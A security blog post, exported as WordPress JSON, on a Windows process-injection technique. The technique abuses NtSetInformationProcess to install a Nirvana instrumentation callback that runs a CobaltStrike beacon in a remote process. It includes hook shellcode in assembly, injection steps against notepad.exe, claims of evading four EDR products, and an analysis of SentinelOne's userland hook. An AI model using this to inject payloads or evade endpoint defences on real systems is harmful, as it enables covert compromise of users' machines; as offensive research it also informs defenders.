{"id":21481,"date":"2023-10-02T10:19:04","date_gmt":"2023-10-02T09:19:04","guid":{"rendered":"https:\/\/www.riskinsight-wavestone.com\/?p=21481"},"modified":"2023-10-10T15:12:31","modified_gmt":"2023-10-10T14:12:31","slug":"process-injection-using-ntsetinformationprocess","status":"publish","type":"post","link":"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/","title":{"rendered":"Process Injection using NtSetInformationProcess"},"content":{"rendered":"\n\n\n\n\n<p><style>code { color: rgb(255,0,102); }<\/style><\/p>\n<div>Process injection is a family of <strong>malware development techniques<\/strong> allowing an attacker to execute a malicious payload into <strong>legitimate addressable memory space<\/strong> of a <strong>legitimate process<\/strong>.<\/div>\n<div>These techniques are interesting because the malicious payload is executed by a legitimate process that could be <strong>less inspected<\/strong> by a security product such as an <strong>EDR<\/strong>.<\/div>\n<div>However, in order to perform this injection, the attacker needs to use<strong> specific functions<\/strong> for memory allocation, and use execution primitives to write and execute his payload in the remote process. In standard process injection patterns, these functions are usually the following Win32API: <code>VirtuallAllocEx<\/code>, <code>WriteProcessMemory<\/code> and <code>CreateRemoteThread<\/code>.<\/div>\n<div>\u00a0<\/div>\n<div><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-21492 aligncenter\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/01.png\" alt=\"\" width=\"945\" height=\"445\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/01.png 945w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/01-406x191.png 406w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/01-71x33.png 71w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/01-768x362.png 768w\" sizes=\"auto, (max-width: 945px) 100vw, 945px\" \/><\/div>\n<div>\u00a0<\/div>\n<div style=\"text-align: center;\"><em>Figure 1: Standard process Injection pattern<\/em><\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<div>Security products can use this the<strong> mandatory use of this type of functions<\/strong> to detect and fight against process injection by <strong>monitoring these API calls<\/strong>. Therefore, in order to keep this type of technique viable, attackers must <strong>find other ways to allocate<\/strong>, write and execute memory in a remote process.<\/div>\n<div>This post aims to show an alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard <code>CreateRemoteThread<\/code> call.<\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<h2>Nirvana Debugger<\/h2>\n<h3>Definition<\/h3>\n<div>In 2015, Alex Ionescu made a presentation about <a href=\"https:\/\/github.com\/ionescu007\/HookingNirvana\/blob\/master\/Esoteric%20Hooks.pdf\">Esoteric Debugging Techniques<\/a>.<\/div>\n<div>One of the topics tackled is the <strong>Nirvana debugging technique<\/strong>. This method allows a process to install a specific hook that will be called <strong>right after every syscall<\/strong> it performs.<\/div>\n<div>When a process is performing a syscall, it forwards the execution flow to the kernel. Then, once the kernel returns from the kernel procedure associated to the syscall, it usually forwards back the execution flow to the calling process as shown in the following figure:<\/div>\n<div>\u00a0<\/div>\n<div><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-21494 aligncenter\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/02.png\" alt=\"\" width=\"346\" height=\"463\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/02.png 346w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/02-143x191.png 143w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/02-29x39.png 29w\" sizes=\"auto, (max-width: 346px) 100vw, 346px\" \/><\/div>\n<div>\u00a0<\/div>\n<div style=\"text-align: center;\"><em>Figure 2: Standard process\/kernel interaction<\/em><\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<div>With the Nirvana debugging technique, it is possible to <strong>register a specific function<\/strong> (executed in <strong>userland<\/strong>) that will be called right before the process gets back the execution flow control from the kernel: the kernel will <strong>forward the execution flow to this hook<\/strong> instead of the initial process as it is shown in the following figure:<\/div>\n<div>\u00a0<\/div>\n<div><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-21496 aligncenter\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/03.png\" alt=\"\" width=\"440\" height=\"399\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/03.png 440w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/03-211x191.png 211w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/03-43x39.png 43w\" sizes=\"auto, (max-width: 440px) 100vw, 440px\" \/>\n<div>\u00a0<\/div>\n<div style=\"text-align: center;\"><em>Figure 3: Execution flow is redirected<\/em><\/div>\n<\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<div>In this hook, all the information needed during a debugging session is available, including <strong>which syscall<\/strong> has been executed, the address from which the syscall was called and the syscall\u2019s return code. This technique was first discussed in 2020 in the article <a href=\"https:\/\/splintercod3.blogspot.com\/p\/weaponizing-mapping-injection-with.html\">Weaponizing Mapping Injection with Instrumentation Callback for stealthier process injection<\/a> by <a href=\"https:\/\/twitter.com\/splinter_code\">@splinter_code<\/a>.<\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<h3>Implementation<\/h3>\n<div>The WIN32API exposes the <code>NtSetProcessInformation<\/code> function that can be used to register a Nirvana callback:<\/div>\n<div>\u00a0<\/div>\n<div><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-21498 aligncenter\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/04.png\" alt=\"\" width=\"605\" height=\"380\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/04.png 605w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/04-304x191.png 304w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/04-62x39.png 62w\" sizes=\"auto, (max-width: 605px) 100vw, 605px\" \/><\/div>\n<div>\u00a0<\/div>\n<div style=\"text-align: center;\"><em>Figure 4: Basic Nirvana hook definition<\/em><\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<div>The <code>NtSetInformationProcess<\/code> function takes the process handle (<code>hProc<\/code>) as a parameter, which should make it possible to add a hook on a <strong>remote process<\/strong>.<\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<h3>On a remote process<\/h3>\n<div>The <code>NtSetInformationProcess<\/code> prototype shows that it can be used to alter a <strong>remote process\u2019s configuration<\/strong>.<\/div>\n<div>However, looking at the function code in <code>ntoskrnl.exe<\/code> shows it is only possible to use the function on a remote process when the <code>SE_DEBUG<\/code> privilege is enabled:<\/div>\n<div>\u00a0<\/div>\n<div><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-21500 aligncenter\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/05.png\" alt=\"\" width=\"489\" height=\"222\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/05.png 489w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/05-421x191.png 421w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/05-71x32.png 71w\" sizes=\"auto, (max-width: 489px) 100vw, 489px\" \/><\/div>\n<div>\u00a0<\/div>\n<div style=\"text-align: center;\"><em>Figure 5: Need to activate SE_DEBUG<\/em><\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<div>The <code>SE_DEBUG<\/code> privilege can be requested by principals allowed in the<strong> \u201cDebug programs\u201d user right assignment<\/strong>. Additionally, the SeDebug privilege cannot be requested by processes with an integrity level lower than \u201chigh\u201d. On most systems, these requirements translate to the need of <strong>running the malicious process<\/strong> with an account member of the <strong>local \u201cadministrators\u201d<\/strong> group, in <strong>elevated mode<\/strong>.<\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<h2>Process Injection With NtSetInformationProcess<\/h2>\n<div>As established in the previous sections, the <code>NtSetInformationProcess<\/code> WIN32API can be used to <strong>register a hook on a remote process<\/strong>. So, it can be used to redirect a remote process execution flow. However, the hook must be located inside the remote process memory space.<\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<h3>Nirvana hook wrapper<\/h3>\n<div>The final goal is to inject a shellcode in the remote process that will be triggered as a Nirvana hook and will call a <strong>CobaltStrike<\/strong> beacon.<\/div>\n<div>The process can be split in two steps:<\/div>\n<ul style=\"list-style-type: square;\">\n<li>First the CobaltStrike beacon is written at the given address <code>${CSAddr}<\/code> in the remote process memory space.<\/li>\n<li>Then the Nirvana Hook, that will perform a <code>CALL ${CSAddr}<\/code>, is written at another address <code>${NirvanaAddr}<\/code> in the remote process memory space.<\/li>\n<\/ul>\n<div>\u00a0<\/div>\n<div>A small kernel debugging on a process with a Nirvana hook installed shows that:<\/div>\n<ul style=\"list-style-type: square;\">\n<li><strong>The kernel only performs a <code>JMP<\/code><\/strong> on the hook address letting him redirect the execution flow to the calling NT function. <br \/>This part is an interesting lesson on Windows internals. As the kernel will be performing a<code> JMP\/CALL<\/code> on a userland function on behalf of the user mode to run the Nirvana hook, it could be a way to <strong>bypass the Windows Control Flow Guard<\/strong>, because this check is usually performed on userland with the <code>LdrpValidateUserCallTarget<\/code> function.<br \/>Here, the kernel had to reimplement this function under the name <code>MmValidateUserCallTarget<\/code> to ensure the callback address is in the allowed function range:<\/li>\n<\/ul>\n<div><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-21502 aligncenter\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/06.png\" alt=\"\" width=\"412\" height=\"260\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/06.png 412w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/06-303x191.png 303w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/06-62x39.png 62w\" sizes=\"auto, (max-width: 412px) 100vw, 412px\" \/><\/div>\n<div>\u00a0<\/div>\n<div style=\"text-align: center;\"><em>Figure 6: Control Flow Guard at kernel level<\/em><\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<ul style=\"list-style-type: square;\">\n<li>The calling function address is stored in the <code>R10<\/code> registry.<\/li>\n<li>The syscall&#8217;s return address is stored in the <code>R11<\/code> registry.<\/li>\n<\/ul>\n<div>\u00a0<\/div>\n<div>So, the hook must jump on <code>R10<\/code> once the <strong>CobaltStrike<\/strong> beacon has been executed to forward back the execution flow to the calling NT function. A basic ASM code can be used:<\/div>\n<div>\u00a0<\/div>\n<pre>push rbp<br \/>mov rbp, rsp<br \/>push rax<br \/>push rbx<br \/>push rcx<br \/>push r9<br \/>push rl0<br \/>push rll<br \/>movabs rax, ${CSAddr}<br \/>call rax<br \/>pop r11<br \/>pop r10<br \/>pop r9<br \/>pop rcx<br \/>pop rbx<br \/>pop rax<br \/>pop rbp<br \/>jmp r10<\/pre>\n<div>\u00a0<\/div>\n<div>This shellcode seems ok, but in fact it will<strong> create an infinite loop<\/strong> as it will be called everytime a syscall is performed. So, it can be modified in order to be <strong>executed only once<\/strong>.<\/div>\n<div>For example, it could be possible to make the code self-modifying to change to replace the <code>PUSH RBP<\/code> by a <code>JMP R10<\/code> in order to break the loop:<\/div>\n<div>\u00a0<\/div>\n<pre>push rbp<br \/>mov rbp, rsp<br \/><br \/>; This will modify the instruction push RBP into JMPR10<br \/>mov qword ptr[rip \u2013 15] 0xE2FF41<br \/><br \/>push rax<br \/>push rbx<br \/>push rcx<br \/>push r9<br \/>push rl0<br \/>push rll<br \/>movabs rax, ${CSAddr}<br \/>call rax<br \/>pop r11<br \/>pop r10<br \/>pop r9<br \/>pop rcx<br \/>pop rbx<br \/>pop rax<br \/>pop rbp<br \/>jmp r10<\/pre>\n<div>\u00a0<\/div>\n<div>So, when the hook has been executed once, it will just jump on <code>R10<\/code> without re-executing the beacon.<\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<h3>Wrapping it all together<\/h3>\n<div>Now the different shellcodes are written, it is possible to perform the injection:<\/div>\n<ul style=\"list-style-type: square;\">\n<li>Open the <code>notepad.exe<\/code> process with your process opening primitive<\/li>\n<li>Allocate a <strong>RX<\/strong> buffer in the<code> notepad.exe<\/code> process for the <strong>Cobaltstrike<\/strong> beacon<\/li>\n<li>Modify the Nirvana shellcode in order to call the <strong>Cobaltstrike<\/strong> beacon address in the remote process<\/li>\n<li>Allocate an <strong>RWX<\/strong> buffer in the <code>notepad.exe<\/code> process for the <strong>Nirvana Hook<\/strong><\/li>\n<li>Write both the shellcode and the <strong>Cobaltstrike<\/strong> beacon in their respective buffer<\/li>\n<li>Add a new Nirvana Hook using the <code>NtSetInformationProcess<\/code><\/li>\n<li>Wait for the notepad to perform a syscall<\/li>\n<\/ul>\n<div>\u00a0<\/div>\n<div>The whole code is available on this Github repository: <a href=\"https:\/\/github.com\/OtterHacker\/SetProcessInjection\"><strong><span style=\"color: #000080;\">https:\/\/github.com\/OtterHacker\/SetProcessInjection<\/span><\/strong><\/a>.<\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<h3>Drawbacks<\/h3>\n<div>The most important drawback is the fact that <code>SE_DEBUG<\/code> privilege is mandatory for the injection. Therefore, this injection method can <strong>only be used during post-exploitation<\/strong> and <strong>not during initial access<\/strong>.<\/div>\n<div>The other problem that could be fixed, giving some time to it, is that the <strong>Nirvana shellcode must be allocated as RWX<\/strong> in a remote buffer as it is a self-rewriting shellcode.<\/div>\n<div>This can be solved by having the shellcode doing a call to <code>VirtualProtect<\/code> by itself or finding another way to break the infinite hook loop (by re-calling <code>NtSetInformationProcess<\/code> directly from the shellcode to remove the callback).<\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<h3>EDR inspection<\/h3>\n<div>The malware has been tested against <strong>Microsoft Defender For Endpoint<\/strong>, <strong>SentinelOne<\/strong>, <strong>TrendMicro<\/strong> and <strong>Sophos<\/strong>. <strong>None of them raised any alerts<\/strong> regarding the execution primitive.<\/div>\n<div>However, it is not because no alerts are raised that no detection has occurred. For example, if we look at the <code>ntdll!SetInformationProcess<\/code> on a process monitored by <strong>SentinelOne<\/strong>, it is possible to see the following userland hook:<\/div>\n<div>\u00a0<\/div>\n<div><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-21504 aligncenter\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/07.png\" alt=\"\" width=\"749\" height=\"227\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/07.png 749w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/07-437x132.png 437w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/07-71x22.png 71w\" sizes=\"auto, (max-width: 749px) 100vw, 749px\" \/><\/div>\n<div>\u00a0<\/div>\n<div style=\"text-align: center;\"><em>Figure 7: SentinelOne userland hook<\/em><\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<div>Following the different <code>JMP<\/code> shows that the hook is located at <code>0x7ffd0160ab00<\/code>. Looking at the process loaded DLL, it is possible to retrieve the SentinelOne DLL\u2019s base address:<\/div>\n<div style=\"text-align: center;\">\u00a0<\/div>\n<div style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-21506\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/08.png\" alt=\"\" width=\"517\" height=\"95\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/08.png 517w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/08-437x80.png 437w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/08-71x13.png 71w\" sizes=\"auto, (max-width: 517px) 100vw, 517px\" \/><\/div>\n<div style=\"text-align: center;\"><em>Figure 7: SentinelOne DLL address<\/em><\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<div>So, the hook\u2019s code is stored in the <code>InProcessClient64.dll<\/code> at the <code>0x7ab00<\/code> offset.<\/div>\n<div>Disassembling the related function in IDA shows the following function:<\/div>\n<div style=\"text-align: center;\">\u00a0<\/div>\n<div style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-21508\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/09.png\" alt=\"\" width=\"556\" height=\"281\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/09.png 766w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/09-378x191.png 378w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/09-71x36.png 71w\" sizes=\"auto, (max-width: 556px) 100vw, 556px\" \/><\/div>\n<div>\u00a0<\/div>\n<div style=\"text-align: center;\"><em>Figure 8: SetInformationProcess hook code<\/em><\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<div>We see that the hook is copying the initial parameter in the <code>SetInfoArgs<\/code> structure, pack it in the <code>SentinelHookParams<\/code> structure and call the <code>ExecuteHook<\/code> function. This function is a succession of different calls leading to the following code:<\/div>\n<div style=\"text-align: center;\">\u00a0<\/div>\n<div style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-21510\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/10.png\" alt=\"\" width=\"407\" height=\"209\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/10.png 407w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/10-372x191.png 372w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/10-71x36.png 71w\" sizes=\"auto, (max-width: 407px) 100vw, 407px\" \/><\/div>\n<div>\u00a0<\/div>\n<div style=\"text-align: center;\"><em>Figure 9: SentinelOne test performed on the hook<\/em><\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<div>This function shows that SentinelOne is <strong>performing tests on this hook<\/strong> and it is specifically related to the <code>ProcessInfomationClass<\/code> used for the <strong>Nirvana Hook registering<\/strong>.<\/div>\n<div>It is possible to look at the different checks that are performed to understand the detection logic set up, but it is not the purpose of this post. However, some obvious checks can be easily observed. The following code shows that the <code>TTDINJECT.EXE<\/code> and <code>TTD.EXE<\/code> executables (related to <strong>Windows Time Travel Debugging<\/strong>) seem to be whitelisted:<\/div>\n<div style=\"text-align: center;\">\u00a0<\/div>\n<div style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-21512\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/11.png\" alt=\"\" width=\"624\" height=\"221\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/11.png 757w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/11-437x155.png 437w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/11-71x25.png 71w\" sizes=\"auto, (max-width: 624px) 100vw, 624px\" \/><\/div>\n<div>\u00a0<\/div>\n<div style=\"text-align: center;\"><em>Figure 10: TTDINJECT whitelisting<\/em><\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<div>Likewise, it is possible to see additional tests performed when the SentinelOne\u2019s <code>ProtectDeepHooking<\/code> feature is activated:<\/div>\n<div style=\"text-align: center;\">\u00a0<\/div>\n<div style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-21514\" src=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/12.png\" alt=\"\" width=\"446\" height=\"146\" srcset=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/12.png 654w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/12-437x143.png 437w, https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/10\/12-71x23.png 71w\" sizes=\"auto, (max-width: 446px) 100vw, 446px\" \/><\/div>\n<div>\u00a0<\/div>\n<div style=\"text-align: center;\"><em>Figure 11: Additional tests performed<\/em><\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<div>The point here is that <strong>some EDR are still performing some detection through userland hook<\/strong> to detect the use of this API. However, as every userland detection mechanism, it is possible to <strong>bypass<\/strong> it using standard <strong>unhooking techniques<\/strong> and no kernel callback have been found to detect and prevent the use of this API.<\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<h2>Conclusion<\/h2>\n<div>This conclusion is exactly the same as the one from my LeHack 2023 talk: <strong>instead of spending months trying to find a way to bypass EDR and starting from scratch, it can be interesting to just looking up and see if some built-in behavior could not be easily hijacked to serve our purpose<\/strong>.<\/div>\n<div>\u00a0<\/div>\n<div><strong>Security products cannot monitor all WIN32API<\/strong> and while behavioral analysis is kicking in, it is still hard for them to <strong>determine if a behavior is legitimate or malicious<\/strong> when using non-standard patterns.<\/div>\n<div>So, <span style=\"text-decoration: underline;\"><strong>be creative<\/strong><\/span>, Microsoft has created hundreds of functions, you will surely find one that will satisfy your needs!<\/div>\n<div>\u00a0<\/div>\n<div>It seems that I am not the only one thinking like this, as a <a href=\"https:\/\/www.deepinstinct.com\/blog\/nofilter-abusing-windows-filtering-platform-for-privilege-escalation\">Defcon31 talk<\/a> about token duplication presented by Ron BEN YIZHAK also <strong>hijacks a non-standard WIN32API<\/strong> to bypass standard detection by avoiding the classic WIN32API direct call.<\/div>\n<div>\u00a0<\/div>\n<div>\u00a0<\/div>\n<div style=\"text-align: right;\"><em>Yoann DEQUEKER<\/em><\/div>\n<div>\u00a0<\/div>\n","protected":false},"excerpt":{"rendered":"<p>Process injection is a family of malware development techniques allowing an attacker to execute a malicious payload into legitimate addressable memory space of a legitimate process. These techniques are interesting because the malicious payload is executed by a legitimate process&#8230;<\/p>\n","protected":false},"author":1453,"featured_media":20951,"comment_status":"open","ping_status":"closed","sticky":true,"template":"page-templates\/tmpl-one.php","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[2777,3922,3273],"tags":[],"coauthors":[4210],"class_list":["post-21481","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cybersecurity-digital-trust","category-deep-dive-en","category-ethical-hacking-indicent-response-en"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Process Injection using NtSetInformationProcess - RiskInsight<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Process Injection using NtSetInformationProcess - RiskInsight\" \/>\n<meta property=\"og:description\" content=\"Process injection is a family of malware development techniques allowing an attacker to execute a malicious payload into legitimate addressable memory space of a legitimate process. These techniques are interesting because the malicious payload is executed by a legitimate process...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/\" \/>\n<meta property=\"og:site_name\" content=\"RiskInsight\" \/>\n<meta property=\"article:published_time\" content=\"2023-10-02T09:19:04+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2023-10-10T14:12:31+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/07\/couverture.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1280\" \/>\n\t<meta property=\"og:image:height\" content=\"853\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Yoann DEQUEKER\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Yoann DEQUEKER\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"12 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/\"},\"author\":{\"name\":\"Yoann DEQUEKER\",\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/#\/schema\/person\/4d873dfbd34bf516c111d70f13642c7c\"},\"headline\":\"Process Injection using NtSetInformationProcess\",\"datePublished\":\"2023-10-02T09:19:04+00:00\",\"dateModified\":\"2023-10-10T14:12:31+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/\"},\"wordCount\":1576,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/07\/couverture.jpg\",\"articleSection\":[\"Cybersecurity &amp; Digital Trust\",\"Deep-dive\",\"Ethical Hacking &amp; Incident Response\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/\",\"url\":\"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/\",\"name\":\"Process Injection using NtSetInformationProcess - RiskInsight\",\"isPartOf\":{\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/07\/couverture.jpg\",\"datePublished\":\"2023-10-02T09:19:04+00:00\",\"dateModified\":\"2023-10-10T14:12:31+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/#primaryimage\",\"url\":\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/07\/couverture.jpg\",\"contentUrl\":\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2023\/07\/couverture.jpg\",\"width\":1280,\"height\":853,\"caption\":\"Personnes travaillant avec des ordinateurs et du papier\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/2023\/10\/process-injection-using-ntsetinformationprocess\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.riskinsight-wavestone.com\/en\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Process Injection using NtSetInformationProcess\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/#website\",\"url\":\"https:\/\/www.riskinsight-wavestone.com\/en\/\",\"name\":\"RiskInsight\",\"description\":\"The cybersecurity &amp; digital trust blog by Wavestone&#039;s 